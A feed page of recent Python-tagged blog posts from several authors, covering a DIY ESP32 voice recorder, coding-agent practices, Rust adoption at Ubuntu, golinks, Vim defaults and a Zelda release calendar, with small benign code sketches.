Posts in Python (20 found)

LLM Use in the Python Source Code

There is a trick that is spreading through social media. If you block the claude user on GitHub, then each time you visit a GitHub repository that has commits by this user, you get a banner at the top alerting you to the user's participation. It's an easy way to spot projects that have started to rely on coding agents, in this case on Claude Code specifically. Imagine the surprise when you see that CPython, one of the most popular open-source projects in the world, is now receiving contributions from it:

Stavros' Stuff 2 days ago

I made a voice note taker

Have you ever always wanted a very very small voice note recorder that would fit in your pocket? Something that would always work, and always be available to take a note at the touch of a button, with no fuss? Me neither. Until, that is, I saw the Pebble Index 01, then I absolutely needed it right away and had to have it in my life immediately, but alas, it is not available, plus it’s disposable, and I don’t like creating e-waste. What was a poor maker like me supposed to do when struck down so cruelly by the vicissitudes of fate? There was only one thing I could do: I could build my own, shitty version of it for $8, and that’s exactly what I did. Like everyone else, I have some sort of undiagnosed ADHD, which manifests itself as my brain itching for a specific task, and the itch becoming unbearable unless I scratch it. This usually results in me getting my phone out, no matter where I am or who I’m with, and either noting stuff down or doing the task, which some people perceive as rude, for inexplicable reasons that are almost certainly their fault. Because, however, it has proved easier to just not get my phone out in polite company than convince everyone of how wrong they are, I just do the former now, but that makes the itch remain. Also, sometimes I’m just in the middle of something, and an idea pops into my head for later pursuit, but I get distracted by a squirrel, a car going by, or the disturbing trend of the constant and persistent erosion of civil rights all over the world, and I forget the idea. The Pebble Index showed me that there’s a better way, a device that’s unobtrusive, available, and reliable enough that I could just press a button, speak into it, and know for sure that my sonorous voice would reach the bowels of my phone, where it would be stored safely until I was bored and wanted something to do.
I didn’t want to have to get my phone out, unlock it, open a voice recorder app, hold down a button, speak, wonder if it heard me, look at the button, realize I had already pressed it, press it again, say the thing again, press it again to stop, exit the app, lock my phone, and put it back into my pocket. I wanted to take a thing out, press a button, speak, release the button, done. The initial thinking was that I’d use a microcontroller (an ESP32 is my microcontroller of choice these days), a microphone, and a lithium battery, and that’s basically all the hardware this needs! Most of the heavy lifting would need to be done in software; the list of things the software would need is at the end of this post. Luckily, I know enough about electronics to know that LLMs would definitely know how to build something like that. Indeed, Claude confirmed my suspicions by saying that all I need is a microphone and an ESP32. It recommended an ESP32-C6 but I went with an ESP32-S3, as it had an onboard charge controller and would be able to charge a lithium battery from USB, which is very handy when you’re making a thing that runs on battery. The ESP32 is a microcontroller, a little computer that’s just really small. The main difference between the S3 and the C6 is that the S3 is more capable, and has more power. I keep an assortment of random components around, so I had an ESP32-S3 board. It’s a no-name, crappy one from AliExpress, not a good, Seeed-branded one from AliExpress, but it would have to do. Unfortunately, I didn’t have a MEMS microphone (which is basically an angelic grain of rice that can hear, with excellent quality), but I did have an electret mic, which is huge and bad quality and would sound like an old-timey radio, but it was there and it was ready and it was willing, and after a few beers it seemed like it was right, or at least right for right now. I also had a very thin LiPo battery, which would suit very well.
For the final device I’d want a battery that’s a tiny bit shorter, as this one was around 40% longer than the ESP32, but it would do great for now. I quickly soldered everything together and recorded some audio. It worked! It worked and nobody was going to take that from me, even though it was crackly and the quality wasn’t great. Unfortunately, at this stage I realized that the analog electret microphone consumes too much energy, even when sleeping, which is terrible on a device that would spend more time sleeping than the beauty from that fairytale, Sleepy the Dwarf. To counteract that, I decided to use a MOSFET to cut power to the mic when the device was asleep. A MOSFET is a little switch that you can turn on and off from a microcontroller, basically. Full disclosure here, before using the MOSFET to turn the mic on and off, I went down a multi-hour rabbit hole trying to design a latching circuit that would allow the ESP32 to turn itself off and consume almost no power. Instead, it consumed a lot of my time, without anything to show for it, because I didn’t manage to make it work at all. The MOSFET for the mic worked fairly well, though, and the device didn’t consume much power when asleep. The real gains, however, were going to be had when the MEMS microphone I ordered arrived, as those use infinitesimal amounts of current when asleep, and have much better sound quality as well, as they are digital. The analog microphone crackled and popped and took a while to stabilize after boot, which was unfortunate because I wanted the device to be ready as soon as the user pressed the button. There was also a recording bug where the recording was missing a few milliseconds of audio every so often, which led to dropped phonemes and words sometimes sounding like other words because parts of them were dropped. 
All these problems were weird enough and hard enough to debug that I resolved to just wait for my digital MEMS microphone to arrive, which would solve them in one fell swoop, as it is digital and amazing. After the relatively easy part of connecting a few wires together, now came the hard part: designing a case for the whole thing that would fit without leaving much empty space, to make the device as small as possible. This was very hard to do with this massive microphone that was as tall as everything else (including battery) combined. I initially tried to point the microphone downward while mounting it at the top, so it would take up the least amount of vertical space possible, but the PCB made that hard, as the microphone was soldered to it. I ended up desoldering the mic from the PCB, trimming the PCB to make it shorter, and connecting the mic to it with wires. That allowed me to make the case (and thus the device) smaller, but at what cost? Nothing, turns out, because it worked great. The device was working great, but I didn’t want it tethered to my computer, I wanted to be able to take it out and about and show it the wonders of the world. To do this, I needed Bluetooth. Unfortunately, I have exactly zero idea how Bluetooth works, and would need to spend days or weeks figuring stuff out, but, luckily for me, I had a Claude subscription. It took a bit of back-and-forth, but I did manage to end up with a Python script that would connect to the pendant, download the audio files, and convert them from ADPCM to MP3, for expanded compatibility. To maximize battery life, the device followed the wake/transfer/sleep flow listed at the end of this post. This worked really well: the device was awake for only a small amount of time (10 seconds), but it could be awoken at any time just by tapping the button. At that point, it would transfer to the PC any files that were on the pendant, and go back to sleep. One downside was that transfers would take an inordinate amount of time, sometimes reaching 2 minutes for a 10-second clip.
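A common reason BLE transfers crawl like this is pulling the file one small read request at a time, paying a connection interval per chunk; the usual fix is to have the device stream the file as back-to-back notifications with sequence numbers, and reassemble on the PC side. Here is a sketch of what that reassembly could look like; the packet format and all names are my own invention, not the actual firmware protocol:

```python
# Sketch: reassemble a file streamed as BLE notification packets.
# Assumed (hypothetical) packet format: a 2-byte little-endian sequence
# number, followed by the payload bytes for that chunk.
import struct


class TransferBuffer:
    """Collects possibly out-of-order notification packets into one blob."""

    def __init__(self, total_packets: int):
        self.total = total_packets
        self.chunks: dict[int, bytes] = {}

    def on_notify(self, packet: bytes) -> None:
        # In a real client this would be registered as the notification
        # callback (e.g. bleak's start_notify).
        seq = struct.unpack_from("<H", packet)[0]
        self.chunks[seq] = packet[2:]

    @property
    def complete(self) -> bool:
        return len(self.chunks) == self.total

    def assemble(self) -> bytes:
        missing = [i for i in range(self.total) if i not in self.chunks]
        if missing:
            raise ValueError(f"missing packets: {missing}")
        return b"".join(self.chunks[i] for i in range(self.total))
```

The win over per-chunk reads is that the peripheral can fire notifications back-to-back within a single connection event instead of waiting a round-trip per request; combined with negotiating a larger MTU, that is where the big speedups tend to come from.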
OpenAI’s Codex was really helpful here, finding a solution for fast BLE transfers that made sending files 100x faster than it was before. Because I’m too impatient to wait for the slow boat from China, I ordered the same microphone locally. I had to pay an arm and a leg in shipping and impatience fees, but it was worth it, because I finally had a MEMS mic! It’s so cute and tiny, I immediately found a spot for it over the board, added the switch, added a voltage divider for sensing battery voltage, and that was it! The new mic sounds fantastic, it sounds better than recording with your phone, for some odd reason that I’m sure is all in my head. What’s more, it doesn’t have the weird bugs that plagued me with the analog mic. With this smaller mic, I could now design a better case. I designed the case you see on the right, which is the second generation. There will be a third, when I receive the shorter battery, which means I will have a choice of either making the device longer but half as thick, or around 40% shorter. I think I will go for longer but thinner, I’d quite prefer to have a thin device in my pocket, even if it’s long, than a stubby one that pokes out. Still, the new battery (and the new case) will mark the completion of this project and make me a very happy man. For the second-gen case, I decided to jazz it up and add a red stripe around it, because it was easy to do and because I think it looks good. Unfortunately, the feature I wanted most (fillets, i.e. rounded corners) wasn’t possible due to the lack of empty space inside the case. I hope the final device will have some more space for fillets, at least. Once I was done with the device, it was time to make it more ergonomic: I’d need to create an Android app so I wouldn’t have to wait to get to my PC. I also knew I wanted note transcription, as it’s really useful to be able to see what you said without having to listen to the audio again. 
Unfortunately again, I have no idea about Android development, only having written a small app years ago. Fortunately, though, Claude turned out to be pretty good at it, and one-shotted this app that you see here. For the transcription, I used GPT-4o Transcribe, which is great and understands both English and Greek, languages I fail to speak in equal measure. I have to say, it’s pretty magical to speak into a little box and to see the audio already captured and transcribed on your phone. With the Android app, I could now test the device in real-world use. One thing I noticed is that the battery dies way too fast. I suspect that has something to do with the cheap board, so I’ve ordered an original Seeed Xiao board, and I hope that will fix the problem once and for all, as they advertise low power usage and they’re a trustworthy brand. I also added a “webhook” convenience function to the Android app, so that the app could send the transcription to a server for further processing. The device is extremely reliable, which makes me a lot more likely to use it. I know that, if I press the button, the audio will be recorded and stored, and nothing will happen to it, which makes for a very relaxed and calming experience. Before I continue, I want to say you can find all the files in this project (firmware, Android app, whatever else) in its GitHub repository: https://github.com/skorokithakis/middle That’s right, I called it Middle, because it was the next thing after the Index. I know it’s a silly name, I don’t care, don’t use it, I’m not changing it. In the “draw the rest of the fucking owl” portion of this article, I realized I didn’t want the notes to just go to my phone when LLMs exist. I wanted an LLM to take the notes and do something with them, so I spent a few weeks writing an AI agent that’s more useful than what currently exists. The device’s Android app sends the transcribed text to this AI, which processes it.
I’m going to write another post about this, but basically, I wanted an AI personal assistant that could help with all the little chores in my life. AI assistants are interesting because they’re very open-ended tools, and highly personal. This means that, when everyone inevitably asks “what is it good for”, I can’t really give a good answer, because the answer is “it takes care of all the little annoyances for me”, but nobody has the same annoyances, so they can’t really imagine what the bot does, and they don’t engage with it. The amazing thing about AI assistants, for me, is the fact that they can string together multiple (otherwise small) tools to do something that’s more valuable than the sum of its parts. For example, I asked the agent to give me a daily briefing every morning, consisting of my todos for the day, my calendar events, whether any refund has hit my bank, and whether any packages are due to be delivered today. The agent also checks my gym bookings and asks me every morning if I do plan to go, or if I intend to cancel. If I tell it to cancel, it does, but if I say I’ll go, it sets an alarm for a few minutes before, which I’m much more likely to see than my calendar’s reminder. It will also (entirely of its own volition) mention things like “you have a gym booking today 7-8pm but you have a restaurant booking at 9pm and it’ll take you more than an hour to shower and make it”, which a regular calendar wouldn’t be able to figure out. I’ve made it fantastically secure: everything is sandboxed, and you can run it on your laptop without fear. I use it constantly throughout the day for many little things, and the integration with the device takes the whole setup to another level. You can find the bot here: https://github.com/skorokithakis/stavrobot Do let me know if you try it, it’s like OpenClaw but won’t steal your data and eat your firstborn. If you have any ideas, feedback, flamebait, or whatever, you can Tweet or Bluesky me, or email me directly.
A few lists that I promised above. What the software would need:

- A way for the device to record audio onto some sort of persistent storage, for the case where you didn’t have your phone close to you.
- A way for the device to sleep, consuming almost no power, until it was woken up by the button.
- A way to transfer the files from the device to the phone, for later listening.
- A battery indicator would be very nice, so I knew when to recharge it.

How a recording worked, to maximize battery life:

- You pressed the button. If you held it down for more than half a second, the recording would “count”.
- If there was a recording made (i.e. if you held the button down long enough), it would be saved.
- Bluetooth would turn on and look for a phone or computer that’s ready to receive.
- The device would send the file and go to sleep again.

And the two things that make AI assistants interesting (and hard to pitch): they’re very open-ended tools, and highly personal.
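The arithmetic behind all that obsessing over sleep current is simple: the device spends almost the whole day asleep, so the average draw (and therefore battery life) is dominated by the sleep draw. A quick sketch, with illustrative numbers rather than measurements from this device:

```python
def battery_life_hours(capacity_mah: float,
                       sleep_ma: float, active_ma: float,
                       awake_seconds_per_day: float) -> float:
    """Estimate runtime from a simple sleep/active duty cycle."""
    day = 24 * 3600.0
    duty = awake_seconds_per_day / day  # fraction of the day spent awake
    avg_ma = active_ma * duty + sleep_ma * (1 - duty)
    return capacity_mah / avg_ma

# Illustrative: a 500 mAh cell, 80 mA while recording/transferring,
# two minutes of awake time per day. An always-powered analog mic
# leaking ~1 mA in sleep vs. a gated/MEMS setup at ~0.02 mA:
leaky = battery_life_hours(500, sleep_ma=1.0, active_ma=80,
                           awake_seconds_per_day=120)
gated = battery_life_hours(500, sleep_ma=0.02, active_ma=80,
                           awake_seconds_per_day=120)
```

With these made-up numbers the gated version lasts roughly eight times longer, which is why a MOSFET on the mic's power rail (or a MEMS mic that barely sips in standby) matters far more than anything the device does while awake.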

Simon Willison 6 days ago

Writing about Agentic Engineering Patterns

I've started a new project to collect and document Agentic Engineering Patterns - coding practices and patterns to help get the best results out of this new era of coding agent development we find ourselves entering. I'm using Agentic Engineering to refer to building software using coding agents - tools like Claude Code and OpenAI Codex, where the defining feature is that they can both generate and execute code - allowing them to test that code and iterate on it independently of turn-by-turn guidance from their human supervisor. I think of vibe coding by its original definition: coding where you pay no attention to the code at all, which today is often associated with non-programmers using LLMs to write code. Agentic Engineering represents the other end of the scale: professional software engineers using coding agents to improve and accelerate their work by amplifying their existing expertise. There is so much to learn and explore about this new discipline! I've already published a lot under my ai-assisted-programming tag (345 posts and counting) but that's been relatively unstructured. My new goal is to produce something that helps answer the question "how do I get good results out of this stuff" all in one place. I'll be developing and growing this project here on my blog as a series of chapter-shaped patterns, loosely inspired by the format popularized by Design Patterns: Elements of Reusable Object-Oriented Software back in 1994. I published the first two chapters today:

- Writing code is cheap now talks about the central challenge of agentic engineering: the cost to churn out initial working code has dropped to almost nothing; how does that impact our existing intuitions about how we work, both individually and as a team?
- Red/green TDD describes how test-first development helps agents write more succinct and reliable code with minimal extra prompting.

I hope to add more chapters at a rate of 1-2 a week. I don't really know when I'll stop, there's a lot to cover! I have a strong personal policy of not publishing AI-generated writing under my own name. That policy will hold true for Agentic Engineering Patterns as well. I'll be using LLMs for proofreading and fleshing out example code and all manner of other side-tasks, but the words you read here will be my own.

Agentic Engineering Patterns isn't exactly a book, but it's kind of book-shaped. I'll be publishing it on my site using a new shape of content I'm calling a guide. A guide is a collection of chapters, where each chapter is effectively a blog post with a less prominent date that's designed to be updated over time, not frozen at the point of first publication. Guides and chapters are my answer to the challenge of publishing "evergreen" content on a blog. I've been trying to find a way to do this for a while now. This feels like a format that might stick. If you're interested in the implementation you can find the code in the Guide, Chapter and ChapterChange models and the associated Django views, almost all of which was written by Claude Opus 4.6 running in Claude Code for web accessed via my iPhone.
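I haven't seen the actual Django models, but the shape Simon describes (a guide of chapters, each an updatable post with a visible change history) could be sketched with plain dataclasses roughly like this; the field names are guesses for illustration, not his schema:

```python
# Sketch of the guide/chapter/change data shapes; hypothetical fields.
from dataclasses import dataclass, field
from datetime import date


@dataclass
class ChapterChange:
    """One entry in a chapter's visible revision history."""
    changed_on: date
    summary: str


@dataclass
class Chapter:
    """Effectively a blog post designed to be updated over time."""
    title: str
    body: str
    first_published: date
    changes: list[ChapterChange] = field(default_factory=list)

    def revise(self, new_body: str, summary: str, on: date) -> None:
        # Updating in place while recording the change is what makes the
        # content "evergreen" rather than frozen at first publication.
        self.body = new_body
        self.changes.append(ChapterChange(on, summary))


@dataclass
class Guide:
    """An ordered collection of evergreen chapters."""
    title: str
    chapters: list[Chapter] = field(default_factory=list)
```

The interesting design choice is that revisions are first-class records rather than silent edits, so the reader can see when and why a chapter changed.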

baby steps 6 days ago

What it means that Ubuntu is using Rust

Righty-ho, I’m back from Rust Nation, and busily horrifying my teenage daughter with my (admittedly atrocious) attempts at doing an English accent 1. It was a great trip with a lot of good conversations and some interesting observations. I am going to try to blog about some of them, starting with some thoughts spurred by Jon Seager’s closing keynote, “Rust Adoption At Scale with Ubuntu”. For some time now I’ve been debating with myself: has Rust “crossed the chasm”? If you’re not familiar with that term, it comes from a book that gives a kind of “pop-sci” introduction to the Technology Adoption Life Cycle. The answer, of course, is that it depends on who you ask. Within Amazon, where I have the closest view, the answer is that we are “most of the way across”: Rust is squarely established as the right way to build at-scale data planes or resource-aware agents and it is increasingly seen as the right choice for low-level code in devices and robotics as well – but there remains a lingering perception that Rust is useful for “those fancy pants developers at S3” (or wherever) but a bit overkill for more average development 3. On the other hand, within the realm of Safety Critical Software, as Pete LeVasseur wrote in a recent rust-lang blog post, Rust is still scrabbling for a foothold. There are a number of successful products but most of the industry is in a “wait and see” mode, letting the early adopters pave the path. The big idea that I at least took away from reading Crossing the Chasm and other references on the technology adoption life cycle is the need for “reference customers”. When you first start out with something new, you are looking for pioneers and early adopters that are drawn to new things: What an early adopter is buying [..] is some kind of change agent. By being the first to implement this change in the industry, the early adopters expect to get a jump on the competition.
– from Crossing the Chasm But as your technology matures, you have to convince people with a lower and lower tolerance for risk: The early majority want to buy a productivity improvement for existing operations. They are looking to minimize discontinuity with the old ways. They want evolution, not revolution. – from Crossing the Chasm So what is most convincing to people to try something new? The answer is seeing that others like them have succeeded. You can see this at play in both the Amazon example and the Safety Critical Software example. Clearly, seeing Rust used for network services doesn’t mean it’s ready to be used in your car’s steering column 4. And even within network services, seeing a group like S3 succeed with Rust may convince other groups building at-scale services to try Rust, but doesn’t necessarily persuade a team to use Rust for their next CRUD service. And frankly, it shouldn’t! They are likely to hit obstacles. All of this was on my mind as I watched the keynote by Jon Seager, the VP of Engineering at Canonical, which is the company behind Ubuntu. Similar to Lars Bergstrom’s epic keynote from years past on Rust adoption within Google, Jon laid out a pitch for why Canonical is adopting Rust that was at once visionary and yet deeply practical. “Visionary and yet deeply practical” is pretty much the textbook description of what we need to cross from early adopters to early majority. We need folks who care first and foremost about delivering the right results, but are open to new ideas that might help them do that better; folks who can stand on both sides of the chasm at once. Jon described how Canonical focuses their own development on a small set of languages: Python, C/C++, and Go, and how they had recently brought in Rust and were using it as the language of choice for new foundational efforts, replacing C, C++, and (some uses of) Python.
Jon talked about how he sees it as part of Ubuntu’s job to “pay it forward” by supporting the construction of memory-safe foundational utilities. Jon meant support both in terms of finances – Canonical is sponsoring the Trifecta Tech Foundation to develop sudo-rs and ntpd-rs, and sponsoring the uutils org’s work on coreutils – and in terms of reputation. Ubuntu can take on the risk of doing something new, prove that it works, and then let others benefit. Remember how the Crossing the Chasm book described early majority people? They are “looking to minimize discontinuity with the old ways”. And what better way to do that than to have drop-in utilities that fit within their existing workflows. With new adoption comes new perspectives. On Thursday night I was at a dinner 5 organized by Ernest Kissiedu 6. Jon Seager was there along with some other Rust adopters from various industries, as were a few others from the Rust Foundation and the open-source project. Ernest asked them to give us their unvarnished takes on Rust. Jon made the provocative comment that we needed to revisit our policy of having a small standard library. He’s not the first to say something like that, it’s something we’ve been hearing for years and years – and I think he’s right! Though I don’t think the answer is just to ship a big standard library. In fact, it’s kind of a perfect lead-in to (what I hope will be) my next blog post, which is about a project I call “battery packs” 7. The broader point though is that shifting from targeting “pioneers” and “early adopters” to targeting the “early majority” sometimes involves some uncomfortable changes: Transition between any two adoption segments is normally excruciatingly awkward because you must adopt new strategies just at the time you have become most comfortable with the old ones. [..] The situation can be further complicated if the high-tech company, fresh from its marketing success with visionaries, neglects to change its sales pitch. [..]
The company may be saying “state-of-the-art” when the pragmatist wants to hear “industry standard”. – Crossing the Chasm (emphasis mine) Not everybody will remember it, but in 2016 there was a proposal called the Rust Platform. The idea was to bring in some crates and bless them as a kind of “extended standard library”. People hated it. After all, they said, why not just add the dependencies yourself? It’s easy enough. And to be honest, they were right – at least at the time. I think the Rust Platform is a good example of something that was a poor fit for early adopters, who want the newest thing and don’t mind finding the best crates, but which could be a great fit for the Early Majority. 8 Anyway, I’m not here to argue for one thing or another in this post, but more for the concept that we have to be open to adapting our learned wisdom to new circumstances. In the past, we were trying to bootstrap Rust into the industry’s consciousness – and we have succeeded. The task before us now is different: we need to make Rust the best option not just in terms of “what it could be” but in terms of “what it actually is” – and sometimes those are in tension. Later in the dinner, the talk turned, as it often does, to money. Growing Rust adoption also comes with growing needs placed on the Rust project and its ecosystem. How can we connect the dots? This has been a big item on my mind, and I realize in writing this paragraph how many blog posts I have yet to write on the topic, but let me lay out a few interesting points that came up over this dinner and at other recent points. First, there are more ways to offer support than $$. For Canonical specifically, as they are an open-source organization through-and-through, what I would most want is to build stronger relationships between our organizations.
With the Rust for Linux developers, Rust maintainers were early on prioritizing and fixing bugs on behalf of RfL devs, but more and more, RfL devs are fixing things themselves, with Rust maintainers serving as mentors. This is awesome! Second, there’s an interesting trend about $$ that I’ve seen crop up in a few places. We often think of companies investing in the open-source dependencies that they rely upon. But there’s an entirely different source of funding, and one that might be even easier to tap, which is to look at companies that are considering Rust but haven’t adopted it yet. For those “would be” adopters, there are often individuals in the org who are trying to make the case for Rust adoption – these individuals are early adopters, people with a vision for how things could be, but they are trying to sell to their early majority company. And to do that, they often have a list of “table stakes” features that need to be supported; what’s more, they often have access to some budget to make these things happen. This came up when I was talking to Alexandru Radovici, the Foundation’s Silver Member Director, who said that many safety critical companies have money they’d like to spend to close various gaps in Rust, but they don’t know how to spend it. Jon’s investments in Trifecta Tech and the uutils org have the same character: he is looking to close the gaps that block Ubuntu from using Rust more. Well, first of all, you should watch Jon’s talk. “Brilliant”, as the Brits have it. But my other big thought is that this is a crucial time for Rust. We are clearly transitioning in a number of areas from visionaries and early adopters towards that pragmatic majority, and we need to be mindful that doing so may require us to change some of the ways that we’ve always done things. I liked this paragraph from Crossing the Chasm: To market successfully to pragmatists, one does not have to be one – just understand their values and work to serve them.
To look more closely into these values: if the goal of visionaries is to take a quantum leap forward, the goal of pragmatists is to make a percentage improvement – incremental, measurable, predictable progress. [..] To market to pragmatists, you must be patient. You need to be conversant with the issues that dominate their particular business. You need to show up at the industry-specific conferences and trade shows they attend. Re-reading Crossing the Chasm as part of writing this blog post has really helped me square where Rust is – for the most part, I think we are still crossing the chasm, but we are well on our way. I think what we see is a consistent trend now where we have Rust champions who fit the “visionary” profile of early adopters successfully advocating for Rust within companies that fit the pragmatist, early majority profile. It strikes me that open source is just an amazing platform for doing this kind of marketing. Unlike a company, we don’t have to do everything ourselves. We have to leverage the fact that open source helps those who help themselves – find those visionary folks in industries that could really benefit from Rust, bring them into the Rust orbit, and then (most important!) support and empower them to adapt Rust to their needs. This last part may sound obvious, but it’s harder than it sounds. When you’re embedded in open source, it seems like a friendly place where everyone is welcome. But the reality is that it can be a place full of cliques and “oral traditions” that “everybody knows” 9. People coming with an idea can get shut down for using the wrong word. They can readily mistake the, um, “impassioned” comments from a random contributor (or perhaps just a troll…) for the official word from project leadership. It only takes one rude response to turn somebody away. So what will ultimately help Rust the most to succeed? Empathy in Open Source. Let’s get out there, find out where Rust can help people, and make it happen. Exciting times!
1. I am famously bad at accents. My best attempt at posh British sounds more like Apu from the Simpsons. I really wish I could pull off a convincing Greek accent, but sadly no.
2. Another of my pearls of wisdom is “there is nothing more permanent than temporary code”. I used to say that back at the startup I worked at after college, but years of experience have only proven it more and more true.
3. Russel Cohen and Jess Izen gave a great talk at last year’s RustConf about what our team is doing to help teams decide if Rust is viable for them. But since then another thing having a big impact is AI, which is bringing previously unthinkable projects, like rewriting older systems, within reach.
4. I have no idea if there is code in a car’s steering column, for the record. I assume so by now? For power steering or some shit?
5. Or am I supposed to call it “tea”? Or maybe “supper”? I can’t get a handle on British mealtimes.
6. Ernest is such a joy to be around. He’s quiet, but he’s got a lot of insights if you can convince him to share them. If you get the chance to meet him, take it! If you live in London, go to the London Rust meetup! Find Ernest and introduce yourself. Tell him Niko sent you and that you are supposed to say how great he is and how you want to learn from the wisdom he’s accrued over the years. Then watch him blush. What a doll.
7. If you can’t wait, you can read some Zulip discussion here.
8. The Battery Packs proposal I want to talk about is similar in some ways to the Rust Platform, but decentralized and generally better in my opinion – but I get ahead of myself!
9. Betteridge’s Law of Headlines has it that “Any headline that ends in a question mark can be answered by the word no”. Well, Niko’s law of open-source 2 is that “nobody actually knows anything that ’everybody’ knows”.

Justin Duke 6 days ago

Golinks

If you've never encountered golinks before: they're short, memorable URLs that redirect to longer ones. Instead of telling a coworker "the dashboard is at ," you just say . Instead of bookmarking seventeen different Notion pages, you type or or and trust that you'll end up in the right place. I discovered them at Stripe, though I believe they were invented at Google, and I have not stopped using them since. One thing leads to another. You decide that you no longer need Tailscale because the main reason you spun up Tailscale was for a project that ended up shipping — and therefore spending per-seat pricing on a service that you literally only use for golinks seems a bit silly and prohibitive. 1 Side note: I still really love Tailscale and think it's a great product and would be shocked if we aren't using it again by the end of the year. But! And then you need to find a replacement for golinks, and you cannot get dragged back to golinks.io or Trotto, both of which are slow, cumbersome, and expensive besides. So what was I to do? First, I looked at the open source options, none of which struck me as particularly compelling. I have a set of requirements that I don't think are esoteric, but others might: And nothing quite fit the bill. I had a revelation: I discovered that you could use a default search engine as the routing proxy instead of or DNS interception like Tailscale's MagicDNS. For a week or two, I had this sitting within Django in our monorepo out of ease — simply intercept any incoming search query, redirect it if something's already in the database, and then if it's not but it looks like it could be, send to the empty state prompting the user to create a golink. But frankly, this was just slower than I wanted. Not for any interesting reason, but just the usual Python request-response lifecycle stuff. 
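Stripped of the Django specifics, the search-engine-as-router trick is a tiny lookup with a fallthrough. Here's a sketch of the idea; the link names, URLs, and the `route` helper are all made up for illustration:

```python
# Hypothetical golink store; in the real setup this lives in a database.
LINKS = {"dashboard": "https://example.com/metrics"}

def route(query: str) -> str:
    """Resolve a browser search query to a redirect target."""
    slug = query.strip().lower()
    if slug in LINKS:
        return LINKS[slug]                      # known golink: redirect
    if slug.isidentifier():                     # plausible golink name
        return f"/golinks/new?slug={slug}"      # empty state: offer to create it
    return f"https://duckduckgo.com/?q={slug}"  # ordinary search: pass through
```

A real deployment registers the handler as the browser's default search engine, so every address-bar query flows through it before (possibly) falling through to a real search engine.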
I could, of course, invest in making it better and faster and was planning on doing so, but figured I would take one last trip around the internet to see if there was some other solution that I somehow missed. And that's when I discovered GoToTools . There is nothing really interesting to say about this product besides the fact that it is very good for what it does. Its author appears to have built it out of the same frustration that I had. And the highest compliment I can give it is that in a year where I've already cut down substantially on the number of services I pay for — in favor of those that I vend — I have absolutely no compunction about starting to use this. The pricing is extraordinary. The performance is really good. It works and is fast and lets me not spend time thinking about golinks and instead lets me spend time using them.

- A reasonable price
- Persistence
- The ability to use golinks without a Chrome extension
- Performance

(think) 1 week ago

How to Vim: Build your .vimrc from Scratch

People often think that getting started with Vim means spending hours crafting an elaborate with dozens of plugins. In reality, modern Vim (9+) and Neovim ship with remarkably sane defaults, and you can get very far with a configuration that’s just a few lines long – or even no configuration at all. If you launch Vim 9 without a file, it automatically loads – a built-in configuration that provides a solid foundation. Here’s what you get for free: That’s actually a pretty reasonable editing experience out of the box! You can read the full details with . Neovim goes even further with its defaults – it enables (copies indentation from the previous line), (highlights all search matches), (makes Tab smarter at the start of a line), (reloads files changed outside the editor), always shows the statusline, and sets the command history to 10000 entries, among many other things. If you’re on Neovim, the out-of-the-box experience is excellent. See for the full list. Here’s something that trips up a lot of people: the moment you create a file – even an empty one – Vim stops loading entirely. That means you lose all those nice defaults. The fix is simple. Start your with: This loads the defaults first, and then your own settings override or extend them as needed. This gotcha only applies to Vim. Neovim’s defaults are always active regardless of whether you have an or . Here’s a minimal that builds on the defaults and adds a few things most people want: That’s five settings on top of the defaults. You might not even need all of them – already handles the fundamentals. For Neovim, you don’t need the line – all the equivalents are already active. You also get , , and for free, so the only settings left to add are the ones that are genuinely personal preference: One of the most underappreciated aspects of Vim is how much built-in support it ships for programming languages. 
When is active (which it is via or Neovim’s defaults), you automatically get: This means that when you open a Python file, Vim already knows to use 4-space indentation. Open a Ruby file and it switches to 2 spaces. Open a Makefile and it uses tabs. All without a single plugin or line of configuration. You can check what’s available with for syntax files or for filetype plugins. The list is impressively long. At some point you’ll probably want more than the bare minimum. Here are a few things worth considering as your next steps: And when you eventually want more plugins, you probably won’t need many. A fuzzy finder, maybe a Git integration, and perhaps a completion engine will cover most needs. But that’s a topic for another day. The key takeaway is this: don’t overthink your . Start with the defaults, add only what you actually need, and resist the urge to copy someone else’s 500-line configuration. A small, well-understood configuration beats a large, cargo-culted one every time. That’s part of the reason why, when I started to re-learn Vim, I opted to slowly build a Vim 9 configuration from scratch, instead of jumping to something like Neovim + Kickstart.nvim or LazyVim right away. Less is more. Understanding the foundations of your editor matters. 1 Right now my is just 100 lines and I don’t foresee it becoming much bigger in the long run. If you want to see just how far you can go without plugins, I highly recommend the Thoughtbot talk How to Do 90% of What Plugins Do (With Just Vim) . It’s a great demonstration of Vim’s built-in capabilities for file finding, auto-completion, tag navigation, and more. That’s all I have for you today. Keep hacking! I guess this sounds strange coming from the author of Emacs Prelude, right?
↩︎

– syntax highlighting
– filetype detection, language-specific plugins, and automatic indentation
– incremental search (results appear as you type)
– keeps 5 lines of context around the cursor
– shows instead of hiding truncated lines
– mouse support in all modes
– remapped to (text formatting) instead of the mostly useless Ex mode
– And several other quality-of-life improvements

– Syntax highlighting for hundreds of languages – Vim ships with around 770+ syntax definitions
– Language-specific indentation rules for over 420 file types
– Filetype plugins that set sensible options per language (e.g., , , )

– A colorscheme – Vim ships with several built-in options (try followed by Tab to see them). Recent Vim builds even bundle Catppuccin – a beautiful pastel theme that I’m quite fond of. Another favorite of mine is Tokyo Night , which you’ll need to install as a plugin. Neovim’s default colorscheme has also been quite good since 0.10.
– Persistent undo – lets you undo changes even after closing and reopening a file. A game changer.
– Clipboard integration – makes yank and paste use the system clipboard by default.
– vim-unimpaired – if you’re on classic Vim (not Neovim), I think Tim Pope’s vim-unimpaired is essential. It adds a consistent set of / mappings for navigating quickfix lists, buffers, adding blank lines, and much more. Neovim 0.11+ has adopted many of these as built-in defaults, but on Vim there’s no substitute.

Evan Hahn 1 week ago

Track Zelda release anniversaries in your calendar

The original Legend of Zelda came out 40 years ago today. With other birthdays on the horizon, like Twilight Princess ’s 20th in November, I wanted a calendar that showed the anniversary of every Zelda game. So I made one. Subscribe to this URL in your calendar app: Once you do, you’ll get calendar events on the anniversary of each game’s release. For example, you’ll be able to see that the Oracle games turn 25 in less than a week…I feel old. If you want to build this file yourself, I wrote a little Python script that generates an ICS file from a CSV of release dates .
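If you're curious what the generation step involves, here's a minimal sketch. It is not the author's script, and the CSV columns, UID format, and yearly RRULE are my assumptions:

```python
from datetime import date

# Hypothetical rows parsed from the CSV: (title, year, month, day).
ROWS = [("The Legend of Zelda", 1986, 2, 21)]

def make_ics(rows):
    lines = ["BEGIN:VCALENDAR", "VERSION:2.0", "PRODID:-//zelda-calendar//EN"]
    for title, y, m, d in rows:
        release = date(y, m, d)
        lines += [
            "BEGIN:VEVENT",
            f"UID:{title.replace(' ', '-').lower()}@example.invalid",
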